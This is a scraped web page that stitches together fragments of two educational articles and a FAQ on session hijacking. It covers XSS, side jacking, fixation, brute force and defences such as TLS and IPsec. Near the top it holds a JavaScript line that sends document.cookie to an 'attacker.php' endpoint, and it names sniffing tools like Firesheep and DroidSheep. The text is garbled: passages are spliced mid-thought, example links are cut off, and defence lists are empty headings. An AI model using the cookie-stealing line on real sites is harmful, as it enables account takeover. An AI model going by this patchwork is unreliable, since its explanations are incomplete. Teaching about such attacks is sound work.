What are the different types of session hijacking explain session hijacking countermeasures?
|
View Discussion Show
Improve Article Save Article View Discussion Improve Article Save Article What is Session Hijacking? Another type of session hijacking is known as a man-in-the-middle attack, where the attacker, using a sniffer, can observe the communication between devices and collect the data that is transmitted. Different ways of session hijacking :
var adr = '../attacker.php?victim_cookie=' + escape(document.cookie); Spoofing is pretending to be someone else. This is a technique used to gain unauthorized access to the computer with an IP address of a trusted host. In implementing this technique, attacker has to obtain the IP address of the client and inject his own packets spoofed with the IP address of client into the TCP session, so as to fool the server that it is communicating with the victim i.e. the original host. If attacker is not able to sniff packets and guess the correct sequence number expected by server, brute force combinations of sequence number can be tried. Mitigation To defend a network with session hijacking, a defender has to implement both security measures at Application
level and Network level. Network level hijacks can be prevented by Ciphering the packets so that the hijacker cannot decipher the packet headers, to obtain any information which will aid in spoofing. This encryption can be provided by using protocols such as IPSEC, SSL, SSH etc. Internet security protocol (IPSEC) has the ability to encrypt the packet on some shared key between the two parties involved in communication. IPsec runs in two modes: Transport and Tunnel. Session hijacking is a serious threat to Networks and Web applications on web as most of the systems are vulnerable to it. Sources;
This article is contributed by Akash Sharan. If you like GeeksforGeeks and would like to contribute, you can also write an article using write.geeksforgeeks.org or mail your article to . See your article appearing on the GeeksforGeeks main page and help other Geeks. Please write comments if you find anything incorrect, or you want to share more information about the topic discussed above. Session hijacking can leave you locked-out of your critical accounts. Read on to learn what session hijacking attacks are and what can be done to avoid them. A session hijacking attack is one in which an attacker takes over the user session of their victim. A user session is created every time a user logs in to an online service: banking sites, shopping sites, your webmail, etc. all create user sessions once you’ve signed in. These sessions are tracked by the server using a session cookie. If an attacker gets their hands on your session cookie, they can log into your accounts as if they were you, bypassing the need for a password. Sound scary? It is. In this article, we’ll look at how the attack works and what can be done to protect against them. Session cookiesWhenever you log in to an online service, the server sets a temporary cookie on your machine so that it knows that you’re logged in and authenticated. Without that session cookie, you would need to re-enter your credentials whenever you navigate to another section of the website. A session hijacking attack can occur when an attacker has a copy of the victim’s session cookie. Once the attacker has access to the victim’s session cookie, they can log in to the service in question as if they were the user and make transactions, change the settings, etc., in the user account. The session cookie contains a session ID that identifies your session and your status. That’s the golden nugget the attacker is after. To obtain it, the attacker must either steal it or convince their victim to click on a malicious link containing a pre-configured session ID. In either case, once the legitimate user has successfully logged in to their account, the attacker can take over the session (that’s the hijacking part) by using the same session ID as the victim did. The server is fooled into authenticating the attacker as the legitimate user. What can an attacker do with a hijacked session?Because the server believes the attacker to be the legitimate user, there are no limits placed on what the attacker can do versus the original user. Account takeovers usually start with the attacker changing the email address associated with the account to an address under their control. They would then change the password on the account, locking the legitimate user out of their own account, and then proceed to change the security questions in the account, the phone number registered in the account, etc. This buys the attacker time, while the locked-out user is presumably on the phone with customer service, to do things like transfer funds from the user’s bank accounts, make purchases on behalf of the victim, steal sensitive personal information, etc., based on the account that was compromised. Anything the user could do, the attacker can now do as well. Ouch. How do session hijacking attacks work?There are many different ways to perform a session hijacking attack. The method used will depend on the server’s configuration and the attacker’s ability to compromise it. Here are the five most common ways to perpetrate a session hijacking attack. Cross-site scripting (XSS)Cross-site scripting is the most widespread method to carry out a session hijacking attack. When a web server is vulnerable to cross-site scripting, an attacker can inject scripts (usually written in JavaScript) into web pages and trick your web browser into executing arbitrary code when the compromised page is loaded. An attacker could craft a link containing a malicious script that points to a trusted website. When clicked, it will send a copy of the victim’s session cookie to a site controlled by the attacker. They could distribute the link through email or instant messaging. If the victim clicks the link, they just handed their session cookie to the attacker. In this context, the attack will be successful if the server does not validate and sanitize user input. Such a link could look like this: http://www.trustedsite.com/search?Of course, were this an actual attack URL, the attacker would likely use URL shortening services and character encoding in an attempt to fly under the radar. An XSS-based session hijacking attack would typically unfold as follows:
Session side jackingAnother common method of pulling off a session hijacking attack is session side jacking. It relies on having access to the victim’s network, so it usually implies unsecured WiFi networks, be they public or private. It also requires that the website in question only uses HTTPS for the login page and not when the authenticated user navigates about the site. This is becoming less and less common. So, with access to the victim’s network and the knowledge that the service they will log into doesn’t use HTTPS throughout the site, the attacker will either sniff/monitor the user’s traffic on public WiFi or set up their own access point, impersonating the victim’s SSID, and mount a man-in-the-middle (MitM) attack, to intercept the victim’s traffic for private WiFi. In either case, as the victim is authenticated and navigates around the website, the attacker can see everything going over the wire. That includes the victim’s session cookies. Worse, if the man-in-the-middle attack is set up prior to the victim entering their credentials, and no HTTPS is used at all, the attacker gets those too. Your web browser should warn you if this is the case. Session fixationSession fixation is another way to get to the victim’s cookies – by “fixing” the session. This method relies on the attacker already having a known session ID for the site in question in their possession. The attacker could then send a malicious login link containing the known session ID to the victim via email, IM, etc. The link uses the genuine URL but appends the attacker’s ID to the end. If the victim logs in to the site using the link, they will be authenticated using the attacker’s known session ID. Once that happens, the attacker can hijack the session as above. An example link would look something like this: Click here to log inThe attacker could also direct the victim to a legitimate-looking fake login page that would actually log the victim into the legitimate website but using the attacker’s session ID. Again, if the victim logs in, the attacker can hijack the session. MalwareMalware is another common way to obtain session cookies for session hijacking attacks. Once the malware is installed, it will scan the victim’s web traffic from the inside and report the victim’s session IDs back to the attacker. Or, depending on the malware in question, it could access the victim’s cookies directly from the browser’s local storage. Brute forceSession IDs are strings of characters that are generated by the server. Suppose the server uses simple sequential patterns to generate its users’ session IDs (user0001, user0002, user0003, etc). In that case, there’s a good chance the attacker could “guess” (using software programs to cycle through thousands of possibilities quickly) the user’s session ID. This was a big issue in the past, but today, most websites generate long and random session IDs, rendering brute force attacks impractical. Session hijacking attack examplesFiresheepFiresheep is a Mozilla Firefox extension, released in 2010, that provided an easy way to extract private information, including session cookies, from users of unencrypted WiFi networks. Sites like Twitter and Facebook were vulnerable to Firesheep until they enabled HTTPS throughout their respective websites. DroidSheepDroidSheep is an Android app that enables session hijacking, previously available on Google Play. It scans HTTP packets and extracts the session cookies’ session ID. DroidSheep supports unencrypted WiFi networks, WEP-secured WiFi networks, and even WPA/WPA2-encrypted networks, as long as they use a pre-shared key (PSK). FaceNiffFaceNiff is another Android app used for session hijacking on public WiFi networks. But this one never made it on Google Play, and your phone must be rooted in order to use the app. The app works by sniffing the traffic on the network and systematically searching for login credentials to large websites, such as Facebook, Youtube, and more. Once FaceNiff finds interesting packets, it analyzes them and then provides the attacker with the victim’s login credentials in a friendly user interface. How can you prevent session hijacking attacks?How to defend against session hijacking attacks depends on which side of the attack you find yourself: the user-side or the server-side. We’ll start with tips for the server-side before moving on to client-side defenses. Server-side defensesThese are measures that site administrators can implement to mitigate session hijacking attacks.
Client-side defensesThe client-side defenses are simply common-sense measures that any internet user should follow.
What else can I do to protect my privacy and security?See our list of recommended privacy and security tools;
See also:
What is the countermeasure for session hijacking?Prevention. Methods to prevent session hijacking include: Encryption of the data traffic passed between the parties by using SSL/TLS; in particular the session key (though ideally all traffic for the entire session).
What are five methods of session hijacking?There are five key methods of Session hijacking: Session Fixation. Session Side Jacking. Cross Site Scripting.
Which of the following is the best countermeasure to session hijacking?Which of the following is the best countermeasure to session hijacking? Answer 103. Option B. Explanation: Encryption make any information the hacker gathers during a session-hijacking attempt unreadable.
What is session hijacking in networking?A session hijacking attack can be best defined as a successful attempt of an attacker to take over your web session. An attacker can impersonate an authorized user to gain access to a domain, server, website, web application, or network to which access is restricted through this type of attack.
|
